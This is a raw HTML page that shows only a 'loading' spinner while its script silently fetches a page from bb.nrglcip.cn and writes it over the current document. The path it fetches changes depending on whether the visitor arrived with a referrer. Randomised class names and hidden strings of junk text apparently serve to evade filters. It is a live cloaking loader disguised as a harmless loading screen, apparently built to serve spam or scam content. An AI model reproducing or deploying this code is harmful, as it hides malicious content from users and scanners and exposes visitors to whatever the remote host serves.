<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bJ6dnANOmd {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bJ6dnANOmd .MGMVs9Wx {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bJ6dnANOmd .content {
            line-height: 50px;
            text-align: center
        }

        .bJ6dnANOmd .img {
            width: 100%
        }

        .bJ6dnANOmd .txLUDOaKxkW {
            text-align: center
        }

        .bJ6dnANOmd .txLUDOaKxkW span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bJ6dnANOmd .txLUDOaKxkW span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bJ6dnANOmd .txLUDOaKxkW span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bJ6dnANOmd .txLUDOaKxkW span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bJ6dnANOmd .txLUDOaKxkW span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bJ6dnANOmd .txLUDOaKxkW span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bJ6dnANOmd .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VDzTXi4Eik(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var B2CKk8 = VDzTXi4Eik('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ B2CKk8 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ B2CKk8 +".html?a=share";
		}
		
        qHrCxWGu28=url+"#"+new Date().getTime();
        qHrCxWGu28 && function() {
            $.get(qHrCxWGu28, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>fAj6oj9P0tZb79SRSdGdkvzDWMjE3V55sxsYb8IPohuaMptveJ4kD21xyjySzjRO7vf4PruLJk</a>
<a  href='#' style='display:none'>fAj6oj9P0tZb79SRSdGdkvzDWMjE3V55sxsYb8IPohuaMptveJ4kD21xyjySzjRO7vf4PruLJk</a>
<img  src='' style='display:none'>
<div style='display:none'>KgeZnbzpknZmMmba0fzYWCgWwnpyIqKSg0FZTuS4QL4</div>
<div style='display:none'>KgeZnbzpknZmMmba0fzYWCgWwnpyIqKSg0FZTuS4QL4</div>
<div style='display:none'>KgeZnbzpknZmMmba0fzYWCgWwnpyIqKSg0FZTuS4QL4</div>
<a  href='#' style='display:none'>fAj6oj9P0tZb79SRSdGdkvzDWMjE3V55sxsYb8IPohuaMptveJ4kD21xyjySzjRO7vf4PruLJk</a><div class="bJ6dnANOmd">
    <div class="MGMVs9Wx">
        <div class="txLUDOaKxkW">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >EAKOpYPyZeWDHjoH0iRebZeRDLtv9DZsecL8Lif8jXuvZBKEodGs0Ot5JPrGmFzl0IfEjIgdU0RS0B3M2zeVCuEtmr1tOZcKjW1</h1>
<a  href='#' style='display:none'>arxak73zxz9KYAjr7FL0bK8rXYKab6ZXC</a>
<h1 style='display:none' >EAKOpYPyZeWDHjoH0iRebZeRDLtv9DZsecL8Lif8jXuvZBKEodGs0Ot5JPrGmFzl0IfEjIgdU0RS0B3M2zeVCuEtmr1tOZcKjW1</h1></body>
</html>